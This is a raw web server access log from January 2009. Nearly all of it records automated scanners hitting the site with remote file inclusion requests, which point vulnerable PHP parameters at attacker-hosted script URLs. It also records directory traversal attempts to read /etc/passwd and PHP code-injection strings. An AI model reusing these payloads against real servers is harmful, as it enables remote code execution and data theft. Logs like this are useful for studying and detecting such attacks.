190.196.5.189 - - [04/Jan/2009:09:05:51 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.196.5.189 - - [04/Jan/2009:09:05:51 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:09:06:00 -0800] "GET /logs/access_081114.log/phphtml.php?htmlclass_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:09:06:25 -0800] "GET /logs/access_080808.log///bemarket/postscript/postscript.php?p_mode=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
190.196.5.189 - - [04/Jan/2009:09:06:33 -0800] "GET /logs/access_080810.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:07:19 -0800] "GET /logs/access_080219.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
209.44.121.2 - - [04/Jan/2009:09:07:23 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.44.121.2 - - [04/Jan/2009:09:07:24 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.213.189 - - [04/Jan/2009:09:07:53 -0800] "GET /logs/access_081123.log/?_shop_path=http://www.leegolf.com/vboard/aid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.189 - - [04/Jan/2009:09:07:55 -0800] "GET /?_shop_path=http://www.leegolf.com/vboard/aid.txt?? HTTP/1.1" 200 94698 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.189 - - [04/Jan/2009:09:07:56 -0800] "GET /logs/?_shop_path=http://www.leegolf.com/vboard/aid.txt?? HTTP/1.1" 200 80886 "-" "libwww-perl/5.79" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:09:07:59 -0800] "GET /logs/access_080901.log/default.php?modul=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:09:08:00 -0800] "GET /default.php?modul=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:09:08:00 -0800] "GET /logs/default.php?modul=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.73.140 - - [04/Jan/2009:09:08:08 -0800] "GET /blog/index.php/2008/09/21/a-little-game-of-moto-tag-92108/trackback/ HTTP/1.1" 200 8833 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
89.36.39.203 - - [04/Jan/2009:09:08:09 -0800] "GET /logs/access_081011.log///calendar.php?pg=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:09:08:15 -0800] "GET //calendar.php?pg=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.213.189 - - [04/Jan/2009:09:08:25 -0800] "GET /logs/access_081208.log/?_shop_path=http://www.leegolf.com/vboard/aid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:09:08:32 -0800] "GET /logs///calendar.php?pg=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:09:08:56 -0800] "GET /logs///bottom.php?style=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:09:09:03 -0800] "GET //bottom.php?style=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.85.45.146 - - [04/Jan/2009:09:09:05 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.85.45.146 - - [04/Jan/2009:09:09:05 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.194.31 - - [04/Jan/2009:09:09:17 -0800] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.194.31 - - [04/Jan/2009:09:09:17 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.194.31 - - [04/Jan/2009:09:09:17 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.181.74 - - [04/Jan/2009:09:09:23 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.csjh.tpc.edu.tw/~sw/board/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.181.74 - - [04/Jan/2009:09:09:23 -0800] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.csjh.tpc.edu.tw/~sw/board/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.181.74 - - [04/Jan/2009:09:09:23 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.csjh.tpc.edu.tw/~sw/board/idbr.txt??? HTTP/1.1" 200 3711 "-" "libwww-perl/5.810" "www.dmulk.com"
200.85.45.146 - - [04/Jan/2009:09:09:28 -0800] "GET /logs/access_080509.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.85.45.146 - - [04/Jan/2009:09:09:28 -0800] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.181.74 - - [04/Jan/2009:09:09:42 -0800] "GET /logs/access_080705.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.csjh.tpc.edu.tw/~sw/board/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
94.23.7.173 - - [04/Jan/2009:09:09:48 -0800] "GET /?mosConfig_absolute_path=http://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 200 94868 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:09:10:11 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:09:10:11 -0800] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:09:10:11 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:09:10:25 -0800] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.153.214.235 - - [04/Jan/2009:09:11:09 -0800] "GET /logs/access_081114.log//?path%5Bdocroot%5D=http://rostrum56.ingeraldton.com/mutcp/read.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.194.31 - - [04/Jan/2009:09:11:11 -0800] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.19.42.210 - - [04/Jan/2009:09:11:53 -0800] "GET /logs/access_080806.log//citywriter/head.php?path=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.42.210 - - [04/Jan/2009:09:11:53 -0800] "GET /citywriter/head.php?path=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.42.210 - - [04/Jan/2009:09:11:54 -0800] "GET /logs//citywriter/head.php?path=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:11:58 -0800] "GET /logs/access_071224.log//library/lib.php?root=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:11:58 -0800] "GET /library/lib.php?root=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:11:58 -0800] "GET /logs/access_080512.log//library/lib.php?root=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:12:09 -0800] "GET /logs/access_081101.log//guestbook1//admin.php?include_path=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:12:09 -0800] "GET /logs//guestbook1//admin.php?include_path=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:12:44 -0800] "GET /logs/access_080219.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:09:12:45 -0800] "GET /logs/access_080523.log///components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.184.239 - - [04/Jan/2009:09:12:45 -0800] "GET /logs/access_081118.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.19.42.210 - - [04/Jan/2009:09:12:47 -0800] "GET /logs/access_080512.log//citywriter/head.php?path=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:09:12:56 -0800] "GET /logs///components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:13:50 -0800] "GET /logs/index2.php?x=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:13:50 -0800] "GET /logs/access_081212.log/index2.php?x=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.149.232.141 - - [04/Jan/2009:09:13:50 -0800] "GET /logs/access_081118.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.75.107 - - [04/Jan/2009:09:13:52 -0800] "GET /logs/access_080103.log%20/akocomments.php?mosConfig_absolute_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:14:04 -0800] "GET /logs/access_080424.log/index2.php?x=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:09:14:17 -0800] "GET /logs/access_080509.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:09:14:19 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 200 95197 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:09:14:20 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:14:23 -0800] "GET /logs/index1.php?x=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:14:23 -0800] "GET /logs/access_080507.log/index1.php?x=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.7.173 - - [04/Jan/2009:09:14:48 -0800] "GET /?mosConfig_absolute_path=http://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 200 94868 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
213.8.172.68 - - [04/Jan/2009:09:14:48 -0800] "GET /?mosConfig_absolute_path=http://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 200 94836 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:09:14:49 -0800] "GET /logs/access_080503.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:09:14:49 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 200 95204 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:09:14:52 -0800] "GET /logs/access_080831.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.8.172.68 - - [04/Jan/2009:09:15:03 -0800] "GET /?mosConfig_absolute_pathhttp://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 200 94732 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:15:05 -0800] "GET /logs/access_080820.log/homepage.php?sel=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:15:05 -0800] "GET /logs/homepage.php?sel=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:15:05 -0800] "GET /logs/access_081105.log/homepage.php?sel=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:15:27 -0800] "GET /logs/access_080831.log/index.php?opcao=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:15:27 -0800] "GET /logs/index.php?opcao=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:15:27 -0800] "GET /logs/access_080707.log/index.php?opcao=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:15:28 -0800] "GET /index.php?opcao=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 200 94759 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:09:15:31 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 200 95204 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.194.31 - - [04/Jan/2009:09:15:31 -0800] "GET /logs/access_080103.log%20/akocomments.php?mosConfig_absolute_path=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.193.232.118 - - [04/Jan/2009:09:15:39 -0800] "GET /logs/access_080830.log/index.php?meio=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.232.118 - - [04/Jan/2009:09:15:40 -0800] "GET /index.php?meio=../../../../../../../../../../etc/passwd HTTP/1.1" 200 94789 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.232.118 - - [04/Jan/2009:09:15:41 -0800] "GET /logs/index.php?meio=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/Jan/2009:09:15:49 -0800] "GET /main.php?sayfa=http://h1.ripway.com/finger/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:15:49 -0800] "GET /logs/access_080707.log/index.php?opcao=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:15:49 -0800] "GET /logs/access_080831.log/index.php?opcao=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:15:50 -0800] "GET /logs/index.php?opcao=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:15:50 -0800] "GET /index.php?opcao=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 200 94775 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:09:15:54 -0800] "GET /logs/access_080810.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.218.85.18 - - [04/Jan/2009:09:15:56 -0800] "GET /logs//main.php?sayfa=http://h1.ripway.com/finger/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/Jan/2009:09:15:56 -0800] "GET /main.php?sayfa=http://h1.ripway.com/finger/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.79.57 - - [04/Jan/2009:09:15:58 -0800] "GET /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://spotlyrics.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.57 - - [04/Jan/2009:09:15:58 -0800] "GET /logs/access_081111.log//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://spotlyrics.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.57 - - [04/Jan/2009:09:15:58 -0800] "GET /logs//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://spotlyrics.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.57 - - [04/Jan/2009:09:16:16 -0800] "GET /logs/access_080912.log//phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://spotlyrics.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:09:16:17 -0800] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:09:16:17 -0800] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:16:18 -0800] "GET /logs/access_081028.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/wongdan/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:16:18 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/wongdan/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:16:18 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/wongdan/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:09:16:18 -0800] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:09:16:18 -0800] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:16:21 -0800] "GET /logs/access_081028.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/wongdan/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:16:21 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/wongdan/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:16:21 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/wongdan/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:16:21 -0800] "GET /logs/access_081028.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/wongdan/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:16:22 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/wongdan/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:16:22 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.stormpages.com/wongdan/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:16:29 -0800] "GET /logs/access_080820.log%20%20/homepage.php?sel=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.7.173 - - [04/Jan/2009:09:16:30 -0800] "GET /logs/access_080716.log//?mosConfig_absolute_pathhttp://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
94.23.7.173 - - [04/Jan/2009:09:16:31 -0800] "GET /?mosConfig_absolute_pathhttp://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 200 94732 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
94.23.7.173 - - [04/Jan/2009:09:16:32 -0800] "GET /logs//?mosConfig_absolute_pathhttp://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 200 80891 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:09:16:35 -0800] "GET /logs/access_080628.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
